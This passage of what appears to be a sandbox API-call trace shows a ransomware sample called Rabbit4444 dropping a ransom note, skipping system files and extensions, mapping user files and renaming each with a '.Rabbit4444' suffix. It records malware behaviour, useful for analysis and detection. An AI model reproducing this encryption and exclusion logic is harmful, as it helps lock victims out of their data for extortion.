ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", cAlternateFileName="SETTIN~2")) returned 0 [0067.232] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0067.232] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.233] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0067.233] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.233] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.233] CloseHandle (hObject=0x27c) returned 1 [0067.233] CloseHandle (hObject=0x228) returned 1 [0067.233] GetCurrentThreadId () returned 0xd98 [0067.234] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0067.234] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}" [0067.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0067.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0067.234] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}" [0067.234] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\" [0067.234] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\.BFC0E91B00AE8A0620D3" [0067.234] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.238] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.240] FlushFileBuffers (hFile=0x228) returned 1 [0067.241] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.241] CloseHandle (hObject=0x228) returned 1 [0067.242] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}") returned 153 [0067.242] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.242] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78d8f9a0, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x799c29bd, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xf16632d7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0067.242] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.242] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.242] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.242] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.242] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78d8f9a0, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x799c29bd, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xf16632d7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.242] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.242] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.242] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.242] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.242] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.242] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf16632d7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf16632d7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf16632d7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.243] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.243] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.243] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794c67e3, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x794c67e3, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x79512c77, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x160bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.0.filtertrie.intermediate.txt", cAlternateFileName="00FILT~1.TXT")) returned 1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.243] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.243] lstrcpyW (in: lpString1=0x130ec6c, lpString2="0.0.filtertrie.intermediate.txt" | out: lpString1="0.0.filtertrie.intermediate.txt") returned="0.0.filtertrie.intermediate.txt" [0067.243] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.0.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.243] lstrlenW (lpString="0.0.filtertrie.intermediate.txt") returned 31 [0067.243] lstrlenW (lpString="Rabbit4444") returned 10 [0067.243] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.243] lstrlenW (lpString=".dll") returned 4 [0067.243] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.243] lstrlenW (lpString=".lnk") returned 4 [0067.243] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.243] lstrlenW (lpString=".ini") returned 4 [0067.243] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.243] lstrlenW (lpString=".sys") returned 4 [0067.244] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.244] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.0.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.244] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.244] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15855490554) returned 1 [0067.244] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=90303) returned 1 [0067.244] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0067.244] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0067.244] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x163c0, lpName=0x0) returned 0x260 [0067.245] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x163c0) returned 0x70000 [0067.250] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.250] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.250] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.250] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.250] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0067.250] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.250] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0067.250] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.250] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15856218827) returned 1 [0067.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0067.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0067.252] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.252] CloseHandle (hObject=0x260) returned 1 [0067.252] CloseHandle (hObject=0x27c) returned 1 [0067.253] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.0.filtertrie.intermediate.txt.Rabbit4444") returned 196 [0067.253] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.0.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.0.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.0.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.253] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79512c77, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x79512c77, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x79512c77, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.1.filtertrie.intermediate.txt", cAlternateFileName="01FILT~1.TXT")) returned 1 [0067.253] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.254] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.254] lstrcpyW (in: lpString1=0x130ec6c, lpString2="0.1.filtertrie.intermediate.txt" | out: lpString1="0.1.filtertrie.intermediate.txt") returned="0.1.filtertrie.intermediate.txt" [0067.254] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.1.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.255] lstrlenW (lpString="0.1.filtertrie.intermediate.txt") returned 31 [0067.255] lstrlenW (lpString="Rabbit4444") returned 10 [0067.255] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.255] lstrlenW (lpString=".dll") returned 4 [0067.255] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.255] lstrlenW (lpString=".lnk") returned 4 [0067.255] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.255] lstrlenW (lpString=".ini") returned 4 [0067.255] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.255] lstrlenW (lpString=".sys") returned 4 [0067.255] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.255] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.1.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.255] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.255] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15856602629) returned 1 [0067.255] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.255] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0067.255] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0067.255] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x260 [0067.258] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.260] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0067.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0067.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.261] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15857153788) returned 1 [0067.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0067.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0067.261] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.261] CloseHandle (hObject=0x260) returned 1 [0067.261] CloseHandle (hObject=0x27c) returned 1 [0067.261] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.1.filtertrie.intermediate.txt.Rabbit4444") returned 196 [0067.261] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.1.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.1.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.1.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.262] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79512c77, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x79512c77, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x79512c77, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.2.filtertrie.intermediate.txt", cAlternateFileName="02FILT~1.TXT")) returned 1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.262] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.262] lstrcpyW (in: lpString1=0x130ec6c, lpString2="0.2.filtertrie.intermediate.txt" | out: lpString1="0.2.filtertrie.intermediate.txt") returned="0.2.filtertrie.intermediate.txt" [0067.262] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.2.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.263] lstrlenW (lpString="0.2.filtertrie.intermediate.txt") returned 31 [0067.263] lstrlenW (lpString="Rabbit4444") returned 10 [0067.263] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.263] lstrlenW (lpString=".dll") returned 4 [0067.263] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.263] lstrlenW (lpString=".lnk") returned 4 [0067.263] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.263] lstrlenW (lpString=".ini") returned 4 [0067.263] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.263] lstrlenW (lpString=".sys") returned 4 [0067.263] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.263] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.2.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.263] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 